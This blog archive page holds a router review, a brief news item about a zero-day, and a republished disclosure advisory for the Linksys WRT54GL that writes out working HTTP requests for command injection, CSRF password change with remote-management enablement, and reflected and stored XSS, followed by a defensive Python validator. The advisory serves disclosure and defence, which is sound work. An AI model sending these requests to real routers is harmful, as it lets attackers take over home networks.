
Jan 30, 2013

Linksys EA3500 N750 Dual Band Giga Router


The full name sounds ominous, but let us simply call it the Linksys EA3500 router. It has dual-band Wi-Fi, 1 Gbps LAN, USB support, and compatibility with Android phones and tablets.


I loved the minimalist, solid design of the device. Most importantly, no nonsense: no wobbling little antennas or flashing lights ...


Just a nice and simple box. Unfortunately, there is no way to hang it under a table or on a wall. Perhaps the manufacturer specifically wanted this box to sit only on a desk or on the computer. Fortunately, there is nothing that a single green paper clip cannot fix.


All the connectors are hidden at the back. This looks much more professional and is much easier to use, because you can see at once that the cables and connections are secure.


Everything about the Linksys EA3500 is extremely simplified. The couple-of-step installation instructions could probably be understood even by orangutans.


If you lose the disc, it is a small problem, because the first time you open a web browser you will find exactly the same thing. I think Linksys really has taken care of everything so that anyone can connect the new router, create a home network and connect to it by themselves.


The Cisco Connect utility allows effortless control of the key router functions: viewing and managing connected computers, changing the wireless network passwords, managing a connected USB drive / flash drive, and setting limits for children (or parents) to restrict Internet traffic. (:


Exactly the same features are available from your mobile phone or tablet with the Cisco Connect Express app for iPhone / Android.


Of course, there is also the standard web user interface for professionals who are already used to it, or for anyone who just wants to reach all the detailed settings. The latter offers what the simple tools lack, e.g.: blocking specific sites for a specific computer, enabling Internet access only during a specified period, and limiting Internet traffic.



Moreover, the Linksys EA3500 is a dual-band router. Imagine it as two routers in one box. So you can simultaneously use two computers connected to Wi-Fi that do not interfere with one another. Or you can connect a game console to one Wi-Fi channel and leave it downloading games, while the computer on the other channel keeps its full browsing speed.


Linksys also has an exceptionally strong Wi-Fi network. Every laptop and phone in the house shows maximum signal strength, 5/5 bars. By comparison, with the previously used TP-Link WR1043ND there was still no Wi-Fi connection in the kitchen ...


The Wi-Fi connection depends not only on the router, but also on the computer or phone used, and on the other wireless networks around. On average, my Toshiba R630 laptop and the game console get 35-40 Mbps on one channel. Using a high-quality Wi-Fi N network card or USB adapter, you can reach maximum speeds of 80 Mbps and 70 Mbps on the 2.4 GHz and 5 GHz channels.


Over cable, the Linksys EA3500 can reach speeds as high as 220 Mbps. Most importantly, it reaches them not only in a continuous stream but in practice, e.g. when downloading torrents. I also liked that the router does not get stuck and does not break down even over a long period of use, so it does not need to be rebooted constantly.


It supports 1 Gbps networking, so a computer can send data over the cable at an impressive 110 MB/s (~880 Mbps). This is like copying files on the local disk. Within minutes you can transfer an entire 7 GB movie.


You can also connect a USB drive or flash memory to the Linksys EA3500 and access it as a network drive or stream video from it. Or even make a home FTP server accessible via the Internet. The only problem is the relatively limited USB 2.0 speed of up to 27 MB/s (~210 Mbps).


I have tried a number of routers. For a long time my favourite was the Linksys WRT160NL, but with the arrival of gigabit routers I replaced it with the TP-Link WR1043ND. Only then did I realize how much better the old Linksys was, because it just worked, while the D-Link would jam, break and lose the wireless connection ... Fortunately, for the past month I have been using the new Linksys EA3500, which is easy to forget about because it always just does the job without problems. Wi-Fi shows all five bars throughout the house, five torrents download at maximum speed, and freezes and breakdowns remain only as memories of the TP-Link.

There is also the gigabit network, which lets you copy files between computers in an instant. I liked the dual-band Wi-Fi: with a game console connected to one channel, downloading games, you can browse in peace on the second channel with a laptop. This should appeal even more to those who often share their connection with others, such as parents who want to limit Internet time or access to certain sites, especially since setting this up, like the entire router, is very simple. For now, 220 Mbps is probably enough for existing Internet plans; for the future, with DD-WRT firmware, the 800 MHz processor and 64 MB of RAM should make it easy to raise the rate 2-3 times.

I found only a couple of drawbacks: the router is not adapted for hanging on the wall (which a paper clip helps to solve), and the standard Cisco firmware boots in only ~40 s. Maybe the second problem is a little funny, because today's Windows 8 PC boots within five seconds, and then you wait another half a minute for the Internet ...

Jan 21, 2013

Linksys WRT54GL 1.1 XSS OS Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Dorks ============

Shodan Search: WRT54GL
=> Results: 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Changing the request method from HTTP POST to HTTP GET makes exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is stored permanently in the configuration, so it gets executed on every boot of the device.

* Changing the password does not require the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Enter Policy Name (place the XSS) -> Summary (script code gets executed))

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Changing the request method from HTTP POST to HTTP GET makes exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=
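As an added example that is not part of the advisory and not Linksys code: a Python input validator for the three apply.cgi parameters the advisory names (wan_hostname, submit_button, f_name), run over a few constructed request-log lines so the same check can flag injection attempts in a proxy or syslog record. The KNOWN_PAGES set, the hostname pattern and the log lines are my assumptions.

```python
import re
from urllib.parse import parse_qs

# Page names apply.cgi dispatches on. Assumed set, built only from the form names
# visible in the advisory; a real firmware would list every page it serves.
KNOWN_PAGES = {"index", "Management", "Wireless_Basic", "Filters"}

# RFC 1123 hostname syntax: letters, digits and inner hyphens only, so backticks,
# spaces and other shell metacharacters can never reach a shell via wan_hostname.
HOSTNAME_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")

def valid_hostname(value: str) -> bool:
    """True only for a syntactically valid hostname of at most 253 characters."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None

def validate_apply_params(body: str) -> list:
    """Return the names of parameters in an apply.cgi body that fail validation."""
    # parse_qs URL-decodes, so %20 and %2e are checked as the space and dot the
    # CGI would actually see, not as encoded text.
    params = parse_qs(body, keep_blank_values=True)
    bad = []
    if params.get("submit_button", [""])[0] not in KNOWN_PAGES:
        bad.append("submit_button")          # reflected XSS vector
    for name in ("wan_hostname", "router_name", "wan_domain"):
        if any(v and not valid_hostname(v) for v in params.get(name, [])):
            bad.append(name)                 # OS command injection vector
    # f_name is free text that is later rendered on the policy summary page:
    # reject HTML metacharacters here in addition to escaping on output.
    if any(re.search(r'[<>"\']', v) for v in params.get("f_name", [])):
        bad.append("f_name")                 # stored XSS vector
    return bad

# Constructed sample request-log lines (not from the page): one benign apply.cgi
# request, the advisory's GET-converted injection, and the stored-XSS GET.
SAMPLE_LOG = [
    "GET /apply.cgi?submit_button=index&wan_hostname=homebox&wan_domain=lan HTTP/1.1",
    "GET /apply.cgi?submit_button=index&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20` HTTP/1.1",
    'GET /apply.cgi?submit_button=Filters&f_name=123"> HTTP/1.1',
]

def suspicious_requests(lines):
    """Return the log lines whose apply.cgi query string fails validation."""
    hits = []
    for line in lines:
        m = re.match(r"^(?:GET|POST) /apply\.cgi\?(\S*) ", line)
        if m and validate_apply_params(m.group(1)):
            hits.append(line)
    return hits
```

The same validator applied on the router side would have rejected all three payloads before they were stored; on the log side it turns the GET conversion the advisory describes into a cheap detection signal.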

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and gave them detailed vulnerability information
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Sent the Beta Agreement back
29.10.2012 - Linksys gave access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of the mostly fixed version (XSS and OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================



Jan 19, 2013

Linksys routers vulnerable to zero-day exploit

A zero-day vulnerability has been discovered in popular Cisco Linksys routers that allows hackers to gain remote root access. Security vendor DefenseCode discovered the flaw and reported it to Cisco months ago and a fix is already on the way.


According to Cisco, more than 70 million Linksys routers have been sold globally. The exploit was successfully tested against a Linksys WRT54GL router by researchers at security firm DefenseCode, who claimed that the latest Linksys firmware 4.30.14 and all previous versions are still vulnerable.

It took the team only 12 days to develop an exploit that could be used by hackers to take control of a person’s wireless router and hijack all the information being processed through it.

The vulnerability is demonstrated in the following video: